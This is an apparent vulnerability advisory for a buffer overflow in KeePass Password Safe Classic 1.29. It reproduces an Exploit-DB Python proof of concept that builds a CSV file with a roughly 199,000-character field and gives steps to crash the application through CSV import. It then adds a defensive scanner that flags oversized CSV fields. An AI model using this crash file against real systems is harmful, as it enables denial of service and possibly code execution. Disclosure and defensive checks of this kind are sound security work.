Vendor: KeePass Password Safe Classic 1.29
By: Mohammad Reza Espargham
CVSS: 7.8 HIGH
Buffer Overflow
CWE: 120 (Buffer Copy without Checking Size of Input)
Product Name: KeePass Password Safe Classic 1.29
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: YES
Platforms Tested: Windows 7 / Server 2008
2020

KeePass Password Safe Classic 1.29 – Crash Proof Of Concept

KeePass Password Safe Classic 1.29 contains a buffer overflow vulnerability: the application does not validate the length of user-supplied data before copying it into a fixed-length buffer. An attacker can exploit this by supplying a specially crafted file to the application, which can result in a denial of service condition or the execution of arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of KeePass Password Safe Classic 1.29

Exploit-DB raw data:

# Title : KeePass Password Safe Classic 1.29 - Crash Proof Of Concept
# Affected Versions: All Version
# Founder : keepass.info
# Tested on Windows 7 / Server 2008
# Download Link : http://sourceforge.net/projects/keepass/files/KeePass%201.x/1.30/KeePass-1.30.zip
#
#
# Author      :   Mohammad Reza Espargham
# Linkedin    :   https://ir.linkedin.com/in/rezasp
# E-Mail      :   me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website     :   www.reza.es
# Twitter     :   https://twitter.com/rezesp
# FaceBook    :   https://www.facebook.com/reza.espargham
#
#
# 1 . run python code : python crash.py
# 2 . open “KeePass”
# 3 . File -> New (Create New Password Database)
# 4 . File -> Import -> CSV File…
# 5 . open r3z4.csv
# 6 . Right Click on “R3Z4” username and edit
# 7 . Crashed ;)



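#!/usr/bin/env python
hdr = '"'  # double quote that opens and closes a field
hcr = "R3Z4"  # user
oth = ',"'  # separator plus the opening quote of the third field
oth2 = '","",""'  # closes the third field and appends two empty fields
val = ','  # field separator
crash = "\x41" * 199289  # 199289 'A' characters: the oversized field
# Record written: "R3Z4","R3Z4","AAAA...","",""
exp = hdr + hcr + hdr + val + hdr + hcr + hdr + oth + crash + oth2
with open("r3z4.csv", "w") as f:
    f.write(exp)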
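
The following pre-import check is an added example, not part of the original advisory or of KeePass: it reports every CSV field longer than a policy limit, which is the property that makes r3z4.csv dangerous to import into an affected version. The function name oversized_fields and the 4096-character limit are assumptions; the page does not state the length at which the crash starts.

```python
#!/usr/bin/env python3
import csv
import io
import sys

# Assumed policy limit for a single field; not a value taken from the advisory.
MAX_FIELD_LEN = 4096


def oversized_fields(text, max_len=MAX_FIELD_LEN):
    """Return (record_no, field_no, length) for each field longer than max_len."""
    # Python's csv module rejects fields above csv.field_size_limit()
    # (131072 by default) with csv.Error. Raise the limit temporarily so the
    # field can be measured and reported instead of aborting the scan.
    # 2**31 - 1 is used because larger values overflow a C long on Windows.
    previous = csv.field_size_limit(2**31 - 1)
    try:
        findings = []
        reader = csv.reader(io.StringIO(text, newline=""))
        for record_no, row in enumerate(reader, 1):
            for field_no, field in enumerate(row, 1):
                if len(field) > max_len:
                    findings.append((record_no, field_no, len(field)))
        return findings
    finally:
        csv.field_size_limit(previous)  # restore the process-wide setting


def check_csv_file(path, max_len=MAX_FIELD_LEN):
    """Scan a CSV file on disk; an empty list means no field exceeds max_len."""
    with open(path, newline="", encoding="utf-8", errors="replace") as handle:
        return oversized_fields(handle.read(), max_len)


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = check_csv_file(sys.argv[1])
    else:
        # Constructed sample with the same shape as the record in r3z4.csv.
        results = oversized_fields('"R3Z4","R3Z4","' + "A" * 199289 + '","",""')
    for record_no, field_no, length in results:
        print(f"record {record_no}, field {field_no}: {length} characters")
    sys.exit(1 if results else 0)
```

Run it with a file path to gate an import; a non-zero exit status means at least one field exceeded the limit.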